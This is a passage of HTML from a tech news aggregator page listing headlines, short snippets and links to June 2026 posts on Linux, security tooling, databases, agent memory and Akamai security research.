              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Operating an unsupported or outdated Linux distribution can expose your organization to critical security risks, drive up maintenance costs, and keep you from using the newest and best tools. However,</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/migrate-confidence-how-red-hat-consulting-de-risks-your-linux-transition"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-sandbox-to-scale-10-ways-red-hat-is-accelerating-enterprise-it" class="group relative scroll-mt-24">
        <a href="#h3-from-sandbox-to-scale-10-ways-red-hat-is-accelerating-enterprise-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From sandbox to scale: 10 ways Red Hat is accelerating enterprise IT
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-sandbox-to-scale-10-ways-red-hat-is-accelerating-enterprise-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Enterprise organizations are pushing past initial AI experimentation, shifting priorities from testing isolated models to safely deploying governable, production-ready workflows across the open hybrid</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/sandbox-scale-10-ways-red-hat-accelerating-enterprise-it"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-public-sentry-key-is-all-it-takes-to-hijack-claude-code-cursor-and-codex" class="group relative scroll-mt-24">
        <a href="#h3-a-public-sentry-key-is-all-it-takes-to-hijack-claude-code-cursor-and-codex" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A public Sentry key is all it takes to hijack Claude Code, Cursor, and Codex
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-public-sentry-key-is-all-it-takes-to-hijack-claude-code-cursor-and-codex"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On June 17, the Threat Labs team at Tenet Security, an AI-agent security startup newly out of stealth, documented an The post A public Sentry key is all it takes to hijack Claude Code, Cursor, and Cod</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/agentjacking-sentry-mcp-attack/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitea-1263-and-1264-are-released" class="group relative scroll-mt-24">
        <a href="#h3-gitea-1263-and-1264-are-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gitea 1.26.3 and 1.26.4 are released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitea-1263-and-1264-are-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are excited to announce the release of Gitea 1.26.3 and Gitea 1.26.4. Version 1.26.3 delivers a large set of security fixes alongside important bug fixes and stability improvements. Version 1.26.4 </p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 Gitea Blog</strong></p>
<p><a href="https://blog.gitea.com/release-of-1.26.3-and-1.26.4"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgadmin-4-v916-released" class="group relative scroll-mt-24">
        <a href="#h3-pgadmin-4-v916-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgAdmin 4 v9.16 Released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgadmin-4-v916-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The pgAdmin Development Team is pleased to announce the release of pgAdmin 4 version 9.16. This release of pgAdmin 4 includes 64 bug fixes and new features, including fixes for seven security vulnerab</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgadmin-4-v916-released-3324/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-lightspeed-on-premise-delivers-infrastructure-intelligence-inside-your-firewall" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-lightspeed-on-premise-delivers-infrastructure-intelligence-inside-your-firewall" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat Lightspeed on premise delivers infrastructure intelligence inside your firewall
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-red-hat-lightspeed-on-premise-delivers-infrastructure-intelligence-inside-your-firewall"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Many organizations now operate under strict data governance requirements—whether driven by the EU’s General Data Protection Regulation (GDPR), Digital Operational Resilience Act (DORA), or NIS2 direct</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-lightspeed-premise-delivers-infrastructure-intelligence-inside-your-firewall"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-your-own-vulnerability-harness" class="group relative scroll-mt-24">
        <a href="#h3-build-your-own-vulnerability-harness" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build your own vulnerability harness
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-your-own-vulnerability-harness"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We break down the technical architecture behind our multi-stage vulnerability discovery harness and automated triage loop. Learn how we manage state controls, squash false positives through adversaria</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/build-your-own-vulnerability-harness/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-full-snyk-ai-security-platform-free-for-open-source-maintainers" class="group relative scroll-mt-24">
        <a href="#h3-the-full-snyk-ai-security-platform-free-for-open-source-maintainers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The full Snyk AI Security Platform, free for open source maintainers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-full-snyk-ai-security-platform-free-for-open-source-maintainers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Open source maintainers are drowning in real vulnerability reports and need help prioritizing, fixing, and shipping remediation faster. Snyk’s Secure Developer Program gives qualifying projects free a</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/secure-developer-program/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office" class="group relative scroll-mt-24">
        <a href="#h3-a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A Day in the Life of an AI Engineer in Snyk's Lisbon Office
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore a day in the life of an AI Engineer at Snyk&#39;s Lisbon office. See what it&#39;s like building AI-powered security tools, collaborating globally, and enjoying the vibrant culture of Portugal&#39;s capit</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-yugabytedb-the-data-backbone-for-thousands-of-agents" class="group relative scroll-mt-24">
        <a href="#h3-yugabytedb-the-data-backbone-for-thousands-of-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 YugabyteDB: The Data Backbone for Thousands of Agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-yugabytedb-the-data-backbone-for-thousands-of-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>YugabyteDB 2026.1 introduces a PostgreSQL database for every agent. This blog covers how to make that vision a reality. Discover how to get started on YugabyteDB AMP (Agentic Multitenant PostgreSQL) a</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/data-backbone-for-thousands-of-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-postgres-language-server-postgres-lsp" class="group relative scroll-mt-24">
        <a href="#h3-new-postgres-language-server-postgres-lsp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Postgres Language Server: postgres-lsp
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-new-postgres-language-server-postgres-lsp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Built on tree-sitter-postgres, postgres-lsp implements the Language Server Protocol for PostgreSQL SQL and PL/pgSQL. Point your editor at it for .sql files and get diagnostics, navigation, completion,</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/new-postgres-language-server-postgres-lsp-3322/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hypopg-143-is-out" class="group relative scroll-mt-24">
        <a href="#h3-hypopg-143-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 HypoPG 1.4.3 is out!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-hypopg-143-is-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Taipei, Taiwan - Sat 20 Jun HypoPG 1.4.3 I&#39;m pleased to announce the release of the version 1.4.3 of HypoPG, an extension adding support for Hypothetical Indexes, compatible with PostgreSQL 9.2 and ab</p>
<p><strong>📅 Jun 20, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/hypopg-143-is-out-3326/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-postgresql-database-for-every-agent" class="group relative scroll-mt-24">
        <a href="#h3-a-postgresql-database-for-every-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A PostgreSQL Database for Every Agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-postgresql-database-for-every-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Newly released YugabyteDB 2026.1 and YugabyteDB AMP (Agentic Multitenant Postgres) provide true serverless, scale-to-zero PostgreSQL, where every agent gets its own real, isolated database starting at</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/a-postgresql-database-for-every-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgfmt-21-in-place-formatting-and-pg_dump-compatible-output" class="group relative scroll-mt-24">
        <a href="#h3-pgfmt-21-in-place-formatting-and-pg_dump-compatible-output" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgfmt 2.1: in-place formatting and pg_dump-compatible output
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgfmt-21-in-place-formatting-and-pg_dump-compatible-output"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>pgfmt 2.1 lands two headline features, plus a steady stream of formatting coverage improvements driven by libpgfmt. It is also now installable from a Homebrew tap. Install via Homebrew brew tap gmr/pg</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgfmt-21-in-place-formatting-and-pg_dump-compatible-output-3321/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-a-bigger-context-window-wont-fix-your-agents-memory" class="group relative scroll-mt-24">
        <a href="#h3-why-a-bigger-context-window-wont-fix-your-agents-memory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why a bigger context window won't fix your agent's memory
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-a-bigger-context-window-wont-fix-your-agents-memory"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Context windows have grown fast. Models that once capped out at a few thousand tokens now advertise hundreds of thousands, and the natural assumption was that the agent memory problem would shrink as </p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/why-bigger-context-window-wont-fix-agent-memory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-retrieval-vs-memory-in-ai-agents-why-context-layers-need-both" class="group relative scroll-mt-24">
        <a href="#h3-retrieval-vs-memory-in-ai-agents-why-context-layers-need-both" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Retrieval vs. memory in AI agents: why context layers need both
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-retrieval-vs-memory-in-ai-agents-why-context-layers-need-both"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A returning user asks your agent why their bill doubled this month. The agent greets them by name, pulls up last week&#39;s billing dispute, and references the workaround your team suggested. Then it conf</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-agent-memory-vs-retrieval/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-faq-real-time-context-engine-agent-memory-and-retrieval" class="group relative scroll-mt-24">
        <a href="#h3-faq-real-time-context-engine-agent-memory-and-retrieval" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 FAQ: Real-time context engine, agent memory, and retrieval
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-faq-real-time-context-engine-agent-memory-and-retrieval"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI agents are getting better at reasoning, planning, and using tools. But even the smartest model can give a bad answer if it has the wrong context, stale data, or too much irrelevant information. Tha</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/faq-real-time-context-engine-agent-memory-and-retrieval/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
